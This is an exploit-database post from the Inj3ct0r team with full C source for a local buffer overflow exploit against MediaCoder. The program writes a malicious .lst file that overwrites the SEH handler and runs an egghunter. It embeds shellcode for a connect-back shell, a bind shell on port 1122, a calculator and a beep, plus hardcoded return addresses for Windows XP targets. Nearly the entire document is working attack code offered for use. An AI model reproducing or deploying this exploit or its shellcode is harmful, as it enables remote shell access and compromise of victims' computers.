|
==================================================== MediaCoder (.lst) file local Buffer Overflow Exploit ====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ####################################### 1 0 I'm fl0 fl0w member from Inj3ct0r Team 1 1 ####################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Discovered By: fl0 fl0w [+] My id: http://inj3ct0r.com/author/1125
#include<stdio.h> #include<getopt.h> #include<string.h> #include<windows.h>
#define PAUSE() getchar() #define R return #define V void #define CONST const #define STATIC static #define SIZE(a) strlen(a) #define FOR(i,a,b) for(i=a;i<b;++i) #define IFeq(a,b) if(a==b) #define IFless(a,b) if(a<b) #define IFgreat(a,b) if(a>b) #define IFnot(a) if(!a) #define fisier FILE #define nul NULL #define SPLIT(a) exit(a) #define VER "0.7.3 build 4612 PSP edition" #define POCNAME "MediaCoder .lst file local buffer overflow exploit" #define AUTHOR "fl0 fl0w" #define IFn(a,b) if(a!=b) #define String_lengh 0x2FC #define EIP_OFFSET 0x300 #define NOP_OFFSET 0x304 #define EGGHUNTER_OFFSET 0x318 #define JUNK_OFFSET 0x34A #define TAG_OFFSET 0x81C #define SHELL_OFFSET 0x824 #define NSEH_OFFSET 0x2FC #define STOP break #define NOP "\x90\x90\x90\x90\x90" \ "\x90\x90\x90\x90\x90" \ "\x90\x90\x90\x90\x90" \ "\x90\x90\x90\x90\x90" typedef char i8; typedef short i16; typedef int i32; enum {True=1,False=0,Error=-1}; size_t len(const i8*); i32 fwt(CONST V*,i32,i32,fisier*); i32 mcpy(V*,CONST V*,i32); i32 mset(V*,i32,i32); i32 prinf(fisier*,CONST i8*,i8*); i32 strcp(CONST i8*,CONST i8*); V print(i8*); DWORD getFsize(fisier*,i8*); V gen_random(i8*,CONST i32); DWORD SearchStream(CONST i8*,size_t,CONST i8*,size_t); DWORD Findpopopret(V); i32 stncmp(CONST i8*,CONST i8*,i32); V help(); i32 closef(fisier*); fisier* openf(CONST i8*,CONST i8*,fisier*); char BeeP[]={ "\x55\x89\xE5\x83\xEC\x18\xC7\x45\xFC" "\x6F\x7A\x83\x7C" "\xC7\x44\x24\x04\xD0\x07\x00\x00\xC7\x04\x24" "\x01\x0E\x00\x00\x8B\x45\xFC\xFF\xD0\xC9\xC3" }; char ConnectBack[]={ /*ConnectBack 127.0.0.1 port 2010*/ "\x31\xc9\xbd\xcb\xe3\xbf\xf7\xb1\x4f\xd9\xc8\xd9\x74\x24\xf4" "\x5f\x31\x6f\x10\x83\xc7\x04\x03\x6f\x0c\x29\x16\x43\x1f\x24" "\xd9\xbc\xe0\x56\x53\x59\xd1\x44\x07\x29\x40\x58\x43\x7f\x69" "\x13\x01\x94\xfa\x51\x8e\x9b\x4b\xdf\xe8\x92\x4c\xee\x34\x78" "\x8e\x71\xc9\x83\xc3\x51\xf0\x4b\x16\x90\x35\xb1\xd9\xc0\xee" "\xbd\x48\xf4\x9b\x80\x50\xf5\x4b\x8f\xe9\x8d\xee\x50\x9d\x27" "\xf0\x80\x0e\x3c\xba\x38\x24\x1a\x1b\x38\xe9\x79\x67\x73\x86" "\x49\x13\x82\x4e\x80\xdc\xb4\xae\x4e\xe3\x78\x23\x8f\x23\xbe" "\xdc\xfa\x5f\xbc\x61\xfc\x9b\xbe\xbd\x89\x39\x18\x35\x29\x9a" "\x98\x9a\xaf\x69\x96\x57\xa4\x36\xbb\x66\x69\x4d\xc7\xe3\x8c" "\x82\x41\xb7\xaa\x06\x09\x63\xd3\x1f\xf7\xc2\xec\x40\x5f\xba" "\x48\x0a\x72\xaf\xea\x51\x1b\x1c\xc0\x69\xdb\x0a\x53\x19\xe9" "\x95\xcf\xb5\x41\x5d\xc9\x42\xa5\x74\xad\xdd\x58\x77\xcd\xf4" "\x9e\x23\x9d\x6e\x36\x4c\x76\x6f\xb7\x99\xd8\x3f\x17\x72\x98" "\xef\xd7\x22\x70\xfa\xd7\x1d\x60\x05\x32\x28\xa7\x92\xc2\x2b" "\x27\x62\x55\x2e\x27\x63\x7f\xa7\xc1\x01\x6f\xee\x5a\xbe\x16" "\xab\x10\x5f\xd6\x61\xb0\xfc\x45\xee\x40\x8a\x75\xb9\x17\xdb" "\x48\xb0\xfd\xf1\xf3\x6a\xe3\x0b\x65\x54\xa7\xd7\x56\x5b\x26" "\x95\xe3\x7f\x38\x63\xeb\x3b\x6c\x3b\xba\x95\xda\xfd\x14\x54" "\xb4\x57\xca\x3e\x50\x21\x20\x81\x26\x2e\x6d\x77\xc6\x9f\xd8" "\xce\xf9\x10\x8d\xc6\x82\x4c\x2d\x28\x59\xd5\x5d\x63\xc3\x7c" "\xf6\x2a\x96\x3c\x9b\xcc\x4d\x02\xa2\x4e\x67\xfb\x51\x4e\x02" "\xfe\x1e\xc8\xff\x72\x0e\xbd\xff\x21\x2f\x94" }; char Bindport1122[]={ "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" "\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48" "\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x37" "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48" "\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48" "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c" "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e" "\x46\x4f\x4b\x33\x46\x45\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48" "\x4f\x55\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x44" "\x4b\x58\x4f\x45\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58" "\x49\x38\x4e\x36\x46\x52\x4e\x41\x41\x56\x43\x4c\x41\x33\x4b\x4d" "\x46\x56\x4b\x38\x43\x34\x42\x53\x4b\x38\x42\x44\x4e\x30\x4b\x48" "\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x34\x4a\x30\x50\x45\x4a\x46" "\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56" "\x43\x55\x48\x36\x4a\x36\x43\x33\x44\x33\x4a\x46\x47\x57\x43\x57" "\x44\x43\x4f\x45\x46\x35\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e" "\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e" "\x48\x46\x41\x38\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x56\x44\x30" "\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55" "\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x45\x43\x35\x43\x35\x43\x44" "\x43\x35\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x36\x46\x50" "\x44\x36\x48\x36\x43\x35\x49\x38\x41\x4e\x45\x49\x4a\x36\x46\x4a" "\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31" "\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d" "\x4a\x36\x45\x4e\x49\x44\x48\x58\x49\x54\x47\x55\x4f\x4f\x48\x4d" "\x42\x55\x46\x35\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46" "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x35" "\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x46\x43\x56" "\x4d\x36\x49\x38\x45\x4e\x4c\x36\x42\x35\x49\x45\x49\x32\x4e\x4c" "\x49\x38\x47\x4e\x4c\x56\x46\x34\x49\x58\x44\x4e\x41\x43\x42\x4c" "\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x52\x50\x4f\x44\x54\x4e\x52" "\x43\x39\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56" "\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f" "\x48\x4d\x4b\x45\x47\x55\x44\x45\x41\x45\x41\x35\x41\x45\x4c\x56" "\x41\x50\x41\x45\x41\x55\x45\x55\x41\x55\x4f\x4f\x42\x4d\x4a\x36" "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36" "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f" "\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" "\x4a\x56\x42\x4f\x4c\x38\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a" }; i8 Calculator[]={ "\xba\x20\xf0\xfd\x7f\xc7\x02\x4c\xaa\xf8\x77\x33\xC0\x50\x68\x63\x61\x6C\x63" "\x54\x5B\x50\x53\xB9\xC7\x93\xC2\x77\xFF\xD1\xEB\xF7" }; i8 egghunter[]={/*IsBadReadPtr egghunter 32 bytes*/ "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" "\x66\x6C\x30\x77" //fl0w tag "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7" }; i8 tag[]={"\x66\x6C\x30\x77" "\x66\x6C\x30\x77" }; i32 j,i,x,custom=0,err; i8 c,shellbuffer[0x3E8],fbuffer[0xF4240],retcode[10]; DWORD ret; i32 main(i32 argc,i8** argv) { ((argc==7)||(argc==8)&&(atoi(argv[4])>0)&&(atoi(argv[6])>0)&&(atoi(argv[4])<6)||(argc==8)&&(atoi(argv[7])==4))?(err=True):(err=Error); IFeq(err,True){ ((strcp(argv[1],"-f")==0)&&(len(argv[1])==2)&&(strcp(argv[3],"-s")==0)&&(len(argv[3])==2)&&(strcp(argv[5],"-t")==0)&&(len(argv[5])==2))?(err=True):(err=Error); IFeq(err,True){ (atoi(argv[6])==1)?(mcpy(&ret,"\x26\x59\x01\x66",4)):(atoi(argv[6])==2)?(mcpy(&ret,"\xB8\x15\xD1\x72",4)):(atoi(argv[6])==3)?(mcpy(&ret,"\x83\x27\x90\x7C",4)):(atoi(argv[6])==4)?(custom=1):(custom=0); IFeq(custom,1){ if((strncmp(argv[7],"0x",(sizeof(i8)*2))==0)&&(len(argv[7])==10)){ for(j=(sizeof(char) * 8) - 1; (j >= 0);j--) { c = *(argv[1] + j + 2); ((c>=48)&&(c<=57)||(c>=65)&&(c<=70)||(c>=97)&&(c<=102))?(err=1):(err=-1); } sscanf(argv[7],"%x",&ret); } else print("syntax error 0x not found"); } } else print("syntax error ,target must be in range[1-4]"); } else { system("cls"); printf("[#]%s\n[#]Ver %s\n[#]Author %s\n",POCNAME,VER,AUTHOR); help(); } switch(atoi(argv[4])){ case 1: mcpy(shellbuffer,ConnectBack,SIZE(ConnectBack)); STOP; case 2: mcpy(shellbuffer,Bindport1122,0x2C5); STOP; case 3: mcpy(shellbuffer,Calculator,0x20); STOP; case 4: mcpy(shellbuffer,BeeP,0x13); STOP; } gen_random(fbuffer,String_lengh); mcpy(fbuffer+NSEH_OFFSET,"\xEB\x06\x90\x90",4); mcpy(fbuffer+EIP_OFFSET,&ret,4); mcpy(fbuffer+NOP_OFFSET,NOP,0x14); mcpy(fbuffer+EGGHUNTER_OFFSET,egghunter,0x20); mset(fbuffer+JUNK_OFFSET,0x58,0x4D2); mcpy(fbuffer+TAG_OFFSET,tag,8); mcpy(fbuffer+SHELL_OFFSET,shellbuffer,len(shellbuffer));
fisier* f=fopen(argv[2],"wb"); fwt(fbuffer,1,0x824+len(shellbuffer),f); closef(f); PAUSE(); print("DONE!"); printf("[!]File is %d bytes",getFsize(f,argv[2])); R 0; }
size_t len(CONST i8* str) { CONST i8* aux=str; R SIZE(aux); } i32 fwt(CONST V* ptr,i32 sz,i32 elem,fisier* fname) { CONST V* p=ptr; R fwrite(p,sz,elem,fname); } i32 mcpy(V* dest,CONST V* source,i32 len) { V* D=dest; CONST* S=source; len=SIZE(source); memcpy(D,S,len); R len; } i32 mset(V* ptr,i32 val,i32 len) { V* f=ptr; i32 valoare=val; memset(f,val,len); R len; } i32 prinf(fisier* str,CONST i8* format,i8* buffer) { fisier* f=str; CONST i8* fm=format; R fprintf(f,fm,buffer); } i32 strcp(CONST i8* str1,CONST i8* str2) { CONST i8* s1=str1; CONST i8* s2=str2; R strcmp(s1,s2); } i32 stncmp(CONST i8* str1,CONST i8* str2,i32 num) { CONST i8* s1=str1; CONST i8* s2=str2; R strncmp(s1,s2,num); } V print(i8* msg) { printf("[*]%s\n",msg); } V gen_random(i8* s,CONST i32 len) { i32 i; STATIC CONST i8 alphanum[]= { "0123456789ABCDEFGHIJKLMNOPQRST" "UVWXYZabcdefghijklmnopqrstuvwxyz"}; FOR(i,0,len) { s[i]=alphanum[rand()%(sizeof(alphanum)-1)]; } s[len]=0; } V help() { i8 h[]= "***************************************************************************\n" "* syntax: [-f<file.m3u>] [-s<shellcode>] [-t<target>] 0xFFFFFFFF *\n" "* -f filename *\n" "* -s shellcode to run [1,5] *\n" "* -t target [1,4] *\n" "* example: mediac.exe -f vuln.lst -s 2 -t 1 *\n" "* mediac.exe -f vuln.lst -s 4 0xFFFFFFFF *\n" "* Shellcode 1.ConnectBack 127.0.0.1 port 2010 *\n" "* 2.Bindport1122 *\n" "* 3.Calculator *\n" "* 4.BeeP *\n" "* Targets 1.Universal *\n" "* 2.Windows xp sp2 en kernel32.dll *\n" "* 3.Windows sp3 en ntdll.dll *\n" "* 4.Windows xp sp1 en *\n" "***************************************************************************\n"; printf("%s",h);} DWORD getFsize(fisier* g,i8* gname) { DWORD s; g=fopen(gname,"rb"); IFeq(g,NULL) { print("File error at reading"); exit(0); } fseek(g,0,SEEK_END); s=ftell(g); R s;} i32 closef(fisier* stream) { fisier* f=stream; R fclose(f); }
|